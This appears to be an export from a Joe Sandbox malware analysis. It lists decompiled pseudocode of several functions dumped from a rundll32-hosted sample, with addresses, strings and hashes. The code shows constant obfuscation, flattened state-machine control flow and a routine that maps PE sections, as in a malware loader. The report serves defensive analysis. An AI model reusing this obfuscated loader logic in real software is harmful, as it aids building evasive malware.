				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E007A4B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E007A4B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E007A4B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E007A3BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E007A3BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E007A4DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}

0x007c13ae
0x007c13b9
0x007c13be
0x007c13c1
0x007c13c4
0x007c13c5
0x007c13c6
0x007c13cb
0x007c13cf
0x007c13d3
0x007c13da
0x007c13e1
0x007c13e8
0x007c13ef
0x007c13f2
0x007c13f9
0x007c1404
0x007c140b
0x007c1412
0x007c1415
0x007c141c
0x007c1423
0x007c142a
0x007c1431
0x007c1438
0x007c143c
0x007c1440
0x007c1447
0x007c144e
0x007c1455
0x007c145c
0x007c1460
0x007c1467
0x007c146e
0x007c1475
0x007c147c
0x007c1483
0x007c148a
0x007c1491
0x007c1498
0x007c149f
0x007c14a6
0x007c14ad
0x007c14b4
0x007c14bb
0x007c14bf
0x007c14c6
0x007c14cd
0x007c14d4
0x007c14db
0x007c14e2
0x007c14e9
0x007c14f0
0x007c14f4
0x007c14f8
0x007c14ff
0x007c1506
0x007c1513
0x007c151a
0x007c1525
0x007c1528
0x007c152f
0x007c1536
0x007c153d
0x007c1544
0x007c1548
0x007c154f
0x007c1556
0x007c155a
0x007c1561
0x007c1568
0x007c156f
0x007c1576
0x007c157a
0x007c1581
0x007c158a
0x007c1591
0x007c159e
0x007c159f
0x007c15a2
0x007c15a6
0x007c15ad
0x007c15b4
0x007c15c0
0x007c15c3
0x007c15c6
0x007c15cd
0x007c15d4
0x007c15df
0x007c15e2
0x007c15e9
0x007c15f0
0x007c15f7
0x007c15fe
0x007c1609
0x007c160c
0x007c1613
0x007c1616
0x007c161b
0x007c161c
0x007c1629
0x007c1632
0x007c163f
0x007c1648
0x007c164d
0x007c1661
0x007c1666
0x007c167c
0x007c1684
0x007c1687
0x007c168d
0x007c1693
0x007c1696
0x007c169c
0x007c16b0
0x007c16ba
0x007c16c4
0x007c16cc

Strings

5M, xrefs: 007C141C
!h, xrefs: 007C1498
d,, xrefs: 007C151A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !h$5M$d,
API String ID: 0-3324333736
Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
Instruction ID: f118863490be01955af3cdcd1ab18267a21511d184e8e5ea19aef4ef103f6449
Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
Instruction Fuzzy Hash: 8791BCB140038C9BCF58CF65C98A9DE3FB1BB04358F509219FE2A96260D3B58999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 007BDEDC Relevance: 3.9, Strings: 3, Instructions: 162
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007BDEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E007B0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E007C0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E007A7FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E007A3DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E007BAC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}

0x007bdee3
0x007bdeea
0x007bdef1
0x007bdef3
0x007bdef4
0x007bdefb
0x007bdf02
0x007bdf03
0x007bdf04
0x007bdf09
0x007bdf11
0x007bdf14
0x007bdf1b
0x007bdf23
0x007bdf28
0x007bdf30
0x007bdf38
0x007bdf40
0x007bdf48
0x007bdf50
0x007bdf58
0x007bdf60
0x007bdf68
0x007bdf70
0x007bdf78
0x007bdf80
0x007bdf85
0x007bdf8a
0x007bdf92
0x007bdf9a
0x007bdfa6
0x007bdfa9
0x007bdfad
0x007bdfb5
0x007bdfbd
0x007bdfc5
0x007bdfcd
0x007bdfd5
0x007bdfdd
0x007bdfe5
0x007bdfed
0x007bdffa
0x007bdffe
0x007be006
0x007be00e
0x007be016
0x007be01e
0x007be026
0x007be02e
0x007be036
0x007be044
0x007be045
0x007be049
0x007be051
0x007be059
0x007be061
0x007be069
0x007be071
0x007be079
0x007be081
0x007be089
0x007be099
0x007be0a1
0x007be0ae
0x007be0b2
0x007be0cc
0x007be0d0
0x007be0d8
0x007be0d8
0x007be0e6
0x007be176
0x007be17b
0x007be17e
0x00000000
0x007be0e8
0x007be0ee
0x007be153
0x007be155
0x007be158
0x00000000
0x007be0f0
0x007be0f6
0x007be1bd
0x007be0fc
0x007be102
0x007be13c
0x007be13d
0x007be13e
0x007be143
0x007be147
0x007be149
0x007be14b
0x00000000
0x007be14b
0x007be104
0x007be106
0x00000000
0x007be10c
0x007be11e
0x007be123
0x007be126
0x00000000
0x007be126
0x007be106
0x007be102
0x007be0f6
0x007be0ee
0x007be1c5
0x007be1c7
0x007be1cc
0x007be1cc
0x007be1d3
0x007be1d3
0x007be18f
0x007be192
0x007be197
0x007be197
0x007be197
0x00000000

Strings

Wp, xrefs: 007BE0A1
d<, xrefs: 007BE089
g, xrefs: 007BE01E

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: d<$g$Wp
API String ID: 0-355099142
Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
Instruction ID: 9334fcaacd624544fec3ba510f75bc4a6f71b3dafc34dedb0ad77c83299d633f
Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
Instruction Fuzzy Hash: C07142B1009345DFC764CF65C48956BBBF1FBC9708F20891DF29A96220D37A8A49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007BC3A0 Relevance: 3.9, Strings: 3, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007BC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E007A474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E007AA3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E007AED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E007AED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}

0x007bc3a5
0x007bc3a9
0x007bc3ab
0x007bc3ad
0x007bc3b1
0x007bc3b5
0x007bc3b6
0x007bc3b7
0x007bc3bc
0x007bc3c3
0x007bc3cb
0x007bc3d3
0x007bc3db
0x007bc3e6
0x007bc3eb
0x007bc3f1
0x007bc3f9
0x007bc401
0x007bc409
0x007bc416
0x007bc419
0x007bc41d
0x007bc425
0x007bc42d
0x007bc435
0x007bc43d
0x007bc445
0x007bc44d
0x007bc455
0x007bc45d
0x007bc465
0x007bc46d
0x007bc472
0x007bc47a
0x007bc482
0x007bc48a
0x007bc48f
0x007bc497
0x007bc49f
0x007bc4a7
0x007bc4af
0x007bc4b7
0x007bc4c7
0x007bc4cb
0x007bc4d4
0x007bc4d9
0x007bc4df
0x007bc4e7
0x007bc4ef
0x007bc4f7
0x007bc4ff
0x007bc507
0x007bc50f
0x007bc518
0x007bc51b
0x007bc51f
0x007bc527
0x007bc52f
0x007bc537
0x007bc53f
0x007bc54c
0x007bc550
0x007bc55a
0x007bc562
0x007bc56a
0x007bc572
0x007bc57a
0x007bc58a
0x007bc58e
0x007bc593
0x007bc595
0x007bc59a
0x007bc5a9
0x007bc5c3
0x007bc5c5
0x007bc5ca
0x007bc628
0x00000000
0x007bc62a
0x007bc5dd
0x007bc5e6
0x007bc5f0
0x007bc5f5
0x007bc623
0x007bc60a
0x007bc618
0x007bc61d
0x007bc620
0x007bc620
0x00000000
0x007bc627
0x007bc630

Strings

V", xrefs: 007BC445
`y, xrefs: 007BC56A
P;8, xrefs: 007BC55A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P;8$V"$`y
API String ID: 0-4109183828
Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
Instruction ID: 95734acde022e92bc0df2f25461ba6875898e6d8d9544a91982281c6a03f4cb6
Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
Instruction Fuzzy Hash: 476144B15183409FC354CF66C88991BBBF1FBC9718F108A1CF69A9A260D7B6D919CF06

Uniqueness

Uniqueness Score: -1.00%

Function 007A1A56 Relevance: 3.9, Strings: 3, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E007A1A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E007BD97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E007A3DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E007A2A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}

0x007a1a5d
0x007a1a61
0x007a1a63
0x007a1a65
0x007a1a69
0x007a1a6a
0x007a1a6b
0x007a1a70
0x007a1a78
0x007a1a7b
0x007a1a85
0x007a1a8d
0x007a1a8f
0x007a1a97
0x007a1a9c
0x007a1aa4
0x007a1aac
0x007a1ab4
0x007a1abc
0x007a1ac4
0x007a1ad3
0x007a1ad4
0x007a1ad8
0x007a1ae0
0x007a1ae8
0x007a1af5
0x007a1af9
0x007a1b01
0x007a1b06
0x007a1b0e
0x007a1b16
0x007a1b1e
0x007a1b26
0x007a1b2e
0x007a1b38
0x007a1b3c
0x007a1b44
0x007a1b4c
0x007a1b51
0x007a1b59
0x007a1b61
0x007a1b69
0x007a1b6e
0x007a1b72
0x007a1b7d
0x007a1b81
0x007a1b89
0x007a1b91
0x007a1b96
0x007a1b9e
0x007a1ba6
0x007a1bb0
0x007a1c36
0x007a1c38
0x007a1bb2
0x007a1bb8
0x007a1bf9
0x007a1bfe
0x007a1c01
0x00000000
0x007a1bba
0x007a1bc0
0x007a1c0d
0x007a1c0d
0x007a1c13
0x00000000
0x00000000
0x007a1c15
0x007a1bc2
0x007a1bd7
0x007a1bdc
0x007a1be1
0x007a1be3
0x00000000
0x007a1be3
0x007a1be1
0x007a1bc0
0x007a1bb8
0x007a1c44
0x007a1c44
0x007a1c08
0x00000000

Strings

DAZ, xrefs: 007A1C08
%#O, xrefs: 007A1B69
DAZ, xrefs: 007A1BB2

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %#O$DAZ$DAZ
API String ID: 0-2081751441
Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
Instruction ID: 7c300682bd2d374c835d91e057241f154097715590b742cb467ac72b4d163d72
Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
Instruction Fuzzy Hash: D05146715083019FC759CF25D98981FBBE1FBD8758F900A2DF586A2221D379CA098B97

Uniqueness

Uniqueness Score: -1.00%

